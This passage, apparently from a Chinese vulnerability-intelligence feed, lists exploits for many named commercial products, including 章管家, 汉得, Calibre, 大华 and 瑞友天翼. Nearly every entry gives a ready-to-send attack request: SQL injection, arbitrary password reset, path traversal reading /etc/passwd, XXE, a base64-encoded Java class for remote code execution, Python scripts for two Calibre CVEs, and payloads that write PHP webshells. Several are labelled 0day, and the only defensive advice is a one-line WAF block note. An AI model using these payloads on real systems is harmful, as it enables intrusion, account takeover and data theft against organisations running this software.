dkFFQUJ0UUJCQWI0QVFnSGtBRU1DQUFCRkFpY0FTQUppQUVrQ2ZnQktBcEVBU3dLL0FFd0N3Z0JOQXNVQU9nTExBRklDMEFCVEF0TUFJZ0xaQUcwQzNBQnhBdDhBYmdMZ0FHOEM1QUJ3QXVjQWN3QlVBQUFCYWdBa0FCb0FCUUJaQUZvQUF3RXJBQThBV3dCY0FCTUJId0FiQUYwQVhnQVNBYThCRmdCZkFGd0FHQUcrQVFjQVlBQmhBQmtCNUFEaEFHSUFZUUFhQWdBQXhRQmpBR0VBR3dJbkFKNEFaQUJsQUJ3Q1lnQmpBR1lBWndBZEFuNEFSd0JvQUdVQUhnS1JBRFFBYVFCbEFCOEJrd0V5QUdvQVpRQVhBWFVCVUFCckFHRUFGZ0ZpQVdrQVdRQnNBQlVBMWdIOUFHMEFYQUFPQU9VQjdnQnVBR0VBRHdEK0FkVUFid0JoQUJBQkFRSFNBSEFBWVFBUkFVTUJrQUJ4QUZ3QUVnRlZBWDRBY2dCekFCTUJYd0YwQUYwQWN3QVVBS0lDTVFCMEFHRUFEUUNIQWt3QWRRQjJBQXdBZUFKaEFIY0FiQUFMQUFjQzFRQjRBSFlBQVFBUEFzMEFlUUI2QUFJQUpnSzJBSHNBZkFBREFDNENyZ0I5QUh3QUJBQTJBcVlBZmdCOEFBVUFQZ0tlQUg4QWZBQUdBRWNDbFFDQUFGd0FCd0JWQW9jQWdRQmNBQWdBY2dKcUFJSUFnd0FKQUhVQ1p3Q0VBSVVBQ2dMZ0FBY0Fld0NHQUFFQUF3TG1BSWNBWlFBQUFJZ0FBQUdYQUE3L0FCa0FBd2NBaVFjQWlnY0Fpd0FCQndDTUJmOEFXQUFNQndDSkJ3Q0tCd0NMQndDTkJ3Q05Cd0NOQndDTkJ3Q09Cd0NPQndBU0FRRUFBUDhBcEFBU0J3Q0pCd0NLQndDTEJ3Q05Cd0NOQndDTkJ3Q05Cd0NPQndDT0J3QVNBUUVIQUlvSEFJOEhBSTRIQUk4SEFJOEhBSThBQVFjQWtCei9BQ2NBRmdjQWlRY0FpZ2NBaXdjQWpRY0FqUWNBalFjQWpRY0FqZ2NBamdjQUVnRUJCd0NLQndDUEJ3Q09Cd0NQQndDUEJ3Q1BCd0NPQndDUkJ3Q1JBUUFBL3dEcUFCMEhBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFjQWlnY0Fqd2NBamdjQWp3Y0Fqd2NBandjQWpnY0FrUWNBa1FFSEFJOEhBSWtIQUk0SEFJOEhBSThIQUk4SEFJa0FBRklIQUpML0FHUUFGZ2NBaVFjQWlnY0Fpd2NBalFjQWpRY0FqUWNBalFjQWpnY0FqZ2NBRWdFQkJ3Q0tCd0NQQndDT0J3Q1BCd0NQQndDUEJ3Q09Cd0NSQndDUkFRQUErZ0FGL3dBSEFBd0hBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFBQStnQUYvd0FGQUFFSEFJa0FBUWNBa3djQUFRQ1VBQUFBQWdDViIpLG5ldyBqYXZheC5tYW5hZ2VtZW50LmxvYWRpbmcuTUxldChuZXcgamF2YS5uZXQuVVJMWzBdLFQgKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCk=';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]}
章管家listUploadIntelligent接口存在sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/app/message/listUploadIntelligent.htm |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /app/message/listUploadIntelligent.htm?&person_id=1&unit_id=1 HTTP/1.1
pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1
pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1
pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 union select md5(123456),2,3,4,5,6,7,8,9,10,11,12 --
章管家updatePwd.htm存在任意账号密码重置漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/app/updatePwd.htm |
WAF封禁路路径,等待发布补丁 |
0814 |
nday |
漏洞详情
POST /app/updatePwd.htm HTTP/1.1
Host:
mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token
章管家 listUploadIntelligent.htm SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/app/message/listUploadIntelligent.htm?token=dingtalk_token |
WAF封禁路路径,等待发布补丁 |
0816 |
0day |
利用路径
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)
Gecko/20100101 Firefox/128.0
Content-Type: application/x-www-form-urlencoded
person_id=1&unit_id=1&pageNo=1&is_read=-1 union select
md5(1),2,3,4,5,6,7,8,9,10,11,12 --
章管家updatePwd.htm存在任意账号密码重置漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/app/updatePwd.htm |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /app/updatePwd.htm HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token
易捷
易捷 OA 协同办公软件 ShowPic 接口存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/servlet/ShowPic |
WAF封禁路路径,等待发布补丁 |
807 |
0day |
漏洞详情
GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1
易捷OA协同办公软件ShowPic接口存在任意文件读取
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/servlet/ShowPic |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1
PowerPMS
PowerPMS APPGetUser 接口 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/APPAccount/APPGetUser |
WAF封禁路路径,等待发布补丁 |
807 |
0day |
漏洞详情
GET /APPAccount/APPGetUser?name=1%27%29%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
汉得
汉得存在RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/oauth/public/ |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /oauth/public/%5f%5f%24%7bT(groovy.lang.GroovyClassLoader).newInstance().defineClass('CALC',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADQAqwoAJABOCgBPAFAHAFEKAAMAUgoAAwBTCwBUAFUIAD8LAFYAVwcAWAoAWQBaCgBbAFwKAAkAXQgAXgoAXwBgCgAJAGEIAGIKAAkAYwgAZAgAZQgAZggAZwoAaABpCgBoAGoKAGsAbAcAbQoAGQBuCABvCgAZAHAKABkAcQoAGQByCABzCgB0AHUKAHQAdgoAdAB3BwB4BwB5AQAGPGluaXQ%2bAQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAB2lzTGludXgBAAFaAQAFb3NUeXABABJMamF2YS9sYW5nL1N0cmluZzsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAAR0aGlzAQAGTENBTEM7AQACc3IBAEJMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlczsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQALcHJpbnRXcml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAh1c2VybmFtZQEADVN0YWNrTWFwVGFibGUHAHgHAFEHAHoHAHsHAHwHAFgHAC8HAH0HAG0BAApFeGNlcHRpb25zBwB%2bAQAKU291cmNlRmlsZQEACUNBTEMuamF2YQwAJQAmBwBxxxxDACAAIEBAEBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzDACCAIMMAIQAhQcAewwAhgCHBwB6DACIAIkBABBqYXZhL2xhbmcvU3RyaW5nBwCKDACLAI4HAI8MAJAAkQwAJQCSAQAHb3MubmFtZQcAkwwAlACJDACVAJYBAAN3aW4MAJcAmAEAAnNoAQACLWMBAAdjbWQuZXhlAQACL2MHAJkMAJoAmwwAnACdBwCeDACfAKABABFqYXZhL3V0aWwvU2Nhbm5lcgwAJQChAQACXGEMAKIAowwApAClDACmAJYBAAAHAHwMAKcAqAwAqQAmDACqACYBAARDQUxDAQAQamF2YS9sYW5nL09iamVjdAEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXREZWNvZGVyAQAHRGVjb2RlcgEADElubmVyQ2xhc3NlcwEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcjsBABhqYXZhL3V0aWwvQmFzZTY0JERlY29kZXIBAAZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAFKFtCKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAFY2xvc2UAIQAjACQAAAAAAAEAAQAlACYAAgAnAAACGAAEAAwAAADZKrcAAbgAAsAAA0wrtgAETSu2AAVOLbkABgEAOgQsEge5AAgCADoFGQXGAKW7AAlZuAAKGQW2AAu3AAw6BQQ2BhINuAAOOgcZB8YAExkHtgAPEhC2ABGZAAYDNgYVBpkAGQa9AAlZAxISU1kEEhNTWQUZBVOnABYGvQAJWQMSFFNZBBIVU1kFGQVTOgi4ABYZCLYAF7YAGDoJuwAZWRkJtwAaEhu2ABw6ChkKtgAdmQALGQq2AB6nAAUSHzoLGQQZC7YAIBkEtgAhGQS2ACIZBLYAIRkEtgAisQAAAAMAKAAAAFoAFgAAAAwABAAOAAsADwAQABAAFQARAB0AEwAnABQALAAWAD0AGABAABkARwAaAFkAGwBcAB4AjAAfAJkAIACpACEAvQAiAMQAIwDJACQAzgAnANMAKADYACkAKQAAAHoADABAAI4AKgArAAYARwCHACwALQAHAIwAQgAuAC8ACACZADUAMAAxAAkAqQAlADIAMwAKAL0AEQA0AC0ACwAAANkANQA2AAAACwDOADcAOAABABAAyQA5ADoAAgAVAMQAOwA8AAMAHQC8AD0APgAEACcAsgAxxxxAC0ABQBAAAAATQAGxxxxwBcAAgHAEEHAEIHAEMHAEQHAEUHAEYBBwBGAAAaUgcARxxxx4ALgcARwcASAcASUEHAEbxxxxABIABgcAQQcAQgcAQwcARAcARQcARgAAAEoAAAAEAAEASwACAEwAAAACAE0AjQAAAAoAAQBbAFkAjAAJ'.replace('xxxx',new%20String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('Lw=='))))).newInstance()-1%7d%5f%5f%3a%3a%78/ab?username=bHM= HTTP/1.1
汉得存在RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/oauth/login?template=xx&username=d2hvYW1p |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
/oauth/login?template=xx&username=d2hvYW1p
Calibre
Calibre任意文件读取漏洞(CVE-2024-6781)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
<= 7.14.0 |
/cdb/cmd/export |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
import json
import sys
import requests
_target = "http://localhost:8080"
_book_id = 1
def exploit(path):
r = requests.post(
f"{_target}/cdb/cmd/export",
headers={"Content-Type": "application/json"},
json=["extra_file", _book_id, path, ""],
)
try:
print(r.json()["result"])
except Exception:
print(r.text)
if __name__ == "__main__":
exploit("..\\..\\..\\Calibre Settings\\gui.json")
Calibre远程代码执行漏洞(CVE-2024-6782)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
6.9.0 ~ 7.14.0 |
/cdb/cmd/export |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
import json
import sys
import requests
_target = "http://localhost:8080"
def exploit(cmd):
r = requests.post(
f"{_target}/cdb/cmd/list",
headers={"Content-Type": "application/json"},
json=[
["template"],
"",
"",
"",
1,
f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()",
],
)
try:
print(list(r.json()["result"]["data"]["template"].values())[0])
except Exception as e:
print(r.text)
if __name__ == "__main__":
exploit("whami")
PerkinElmer
PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
1.11.6507.0 |
/ProcessPlus/Log/Download/ |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1
journalx
journalx稿件远程处理系统XXE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| XXE |
未知 |
/jtcgi/soap_cgi.pyc |
WAF封禁路路径,等待发布补丁 |
809 |
1day |
漏洞详情
POST /jtcgi/soap_cgi.pyc HTTP/1.1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>
驰骋
驰骋BPM RunSQL_Init SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/WF/Comm/Handler.ashx |
WAF封禁路路径,等待发布补丁 |
809 |
1day |
漏洞详情
POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
------123128312312389898yd98ays98d
SELECT No,Pass FROM Port_Emp
------123128312312389898yd98ays98d--
ALR
ALR-F800存在命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cmd.php |
|
|
|
| /cgi-bin/upgrade.cgi |
|
|
|
|
|
| /admin/system.html |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
|
|
漏洞详情
POST /cmd.php HTTP/1.1
cmd=help
重置密码
POST /cmd.php HTTP/1.1
cmd=password=password
写文件
POST /cgi-bin/upgrade.cgi HTTP/1.1
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
Hi!
------WebKitFormBoundaryQ3keNKAe5AQ9G7bs
命令执行
POST /admin/system.html HTTP/1.1
------WebKitFormBoundaryJpks6wYXiOago8MS
3M
------WebKitFormBoundaryJpks6wYXiOago8MS
123
------WebKitFormBoundaryJpks6wYXiOago8MS
Install
------WebKitFormBoundaryJpks6wYXiOago8MS--
Atmail
Atmail存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/index.php/admin/index/login |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /index.php/admin/index/login HTTP/1.1
Language=ca&Password=1&Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&login=1&send=1&server=https://ip:port/
ELADMIN
ELADMIN后台管理系统存在SSRF漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SSRF |
未知 |
/api/serverDeploy/testConnect |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /api/serverDeploy/testConnect HTTP/1.1
{"id":9,"name":"53","ip":"xxx.dnslog.cn","account":"root","password":"1321","createBy":"admin","creatTime":"2024-08-06 00:00:00","updateBy":"admin","updateTime":"2024-08-06 00:00:00"}
Journyx
Journyx存在未经身份验证的XML外部实体注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/jtcgi/soap_cgi.pyc |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /jtcgi/soap_cgi.pyc HTTP/1.1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>
Mtab
Mtab书签导航程序存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/LinkStore/getIcon |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /LinkStore/getIcon HTTP/1.1
{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}
三汇
三汇网关管理软件debug.php远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/debug.php |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /debug.php HTTP/1.1
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
1
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
sleep 3
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--
大华
大华DSS系统group_saveGroup存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/emap/group_saveGroup |
WAF封禁路路径,等待发布补丁 |
812 |
0day |
漏洞详情
GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1 HTTP/1.1
大华智慧综合管理园区 文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/emap/webservice/gis/soap/bitmap |
WAF封禁路路径,等待发布补丁 |
0828 |
0day |
漏洞详情
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Host:
<soapenv:Envelope
<soapenv:Body>
<res:uploadPicFile>
<arg0>
<picPath>/../test.jsp</picPath>
</arg0>
<arg1>JSP 的 base64 编码</arg1>
</res:uploadPicFile>
</soapenv:Body>
</soapenv:Envelope>
瑞友
瑞友天翼应用虚拟化系统SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ConsoleExternalUploadApi.XGI |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
key=ServerIPType'+union+select+'test'+into+outfile+'..\\\\..\\\\WebRoot\\\\ddd.xgi&initParams=x&sign=x
瑞友天翼应用虚拟化系统 index.php 反序列化注入 Getshell
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1 |
/ConsoleExternalUploadApi.XGI |
|
|
|
| /index.php |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
|
|
漏洞详情
POST /ConsoleExternalUploadApi.XGI?key=ServerIPType&initParams=command_uploadAuthorizeKeyFile__user_admin%27+or+%271%27=%271__pwd_2__serverIdStr_1&sign=8091edfafcf0936b64c7d7f2d7bb071f HTTP/1.1
------WebKitFormBoundaryVSwwKKlD
0|1|2|a:1:{s:7:"user_id";s:169:"1') Union Select '<?php phpinfo()?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 into outfile '..\\\\..\\\\WebRoot\\\\1.xgi' -- ";}
------WebKitFormBoundaryVSwwKKlD--
POST /index.php HTTP/1.1
s=/Index/index&sessId=cf1.key
瑞友天翼应用虚拟化系统 GetBSAppUrl 存在SQL漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1 |
/index.php |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
GET /index.php?s=/Agent/GetBSAppUrl/AppID/1'+and+(extractvalue(1,concat(0x7e,(select+md5(1)),0x7e)))+and+'a'='a HTTP/1.1
瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/AgentBoard.XGI |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
http://127.0.0.1/AgentBoard.XGI?user=-1%27%20union%20select%201,%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22..\\\\..\\\\WebRoot\\\\test.XGI%22%20--%20-&cmd=UserLogin
宝兰德
宝兰德 BES 中间件 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/BesEJB/spark |
WAF封禁路路径,等待发布补丁 |
812 |
0day |
漏洞详情
POST /BesEJB/spark HTTP/1.1
Host:
恶意序列化数据
中成科信
中成科信票务管理系统 SeatMapHandler.ashx SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/SystemManager/Comm/SeatMapHandler.ashx |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Method=GetZoneInfo&solutionNo=%27+AND+7821+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%287821%3D7821%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--+Vjyh
中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/SystemManager/Api/TicketManager.ashx |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--
安美
安美数字酒店宽带运营系统weather.php任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/user/weather.php |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /user/weather.php?Lang=../../../etc/passwd HTTP/1.1
caiji
某短视频直播打赏系统任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/caiji/get_curl |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1
某短视频直播打赏系统后台任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/admin/ajax/upload |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /admin/ajax/upload HTTP/1.1
------WebKitFormBoundaryqVHCE6rweLU4xoLd
php
------WebKitFormBoundaryqVHCE6rweLU4xoLd
<?php phpinfo();?>
------WebKitFormBoundaryqVHCE6rweLU4xoLd--
润申
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/PDCA/ashx/CommentStandardHandler.ashx |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /PDCA/ashx/CommentStandardHandler.ashx HTTP/1.1
action=detailInfo&fileid=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--
润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ashx/DefaultHandler.ashx |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /ashx/DefaultHandler.ashx HTTP/1.1
action=GetDetail&status=300&id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--
金斗云
金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/admin/configApp/queryPrintTemplate |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /admin/configApp/queryPrintTemplate HTTP/1.1
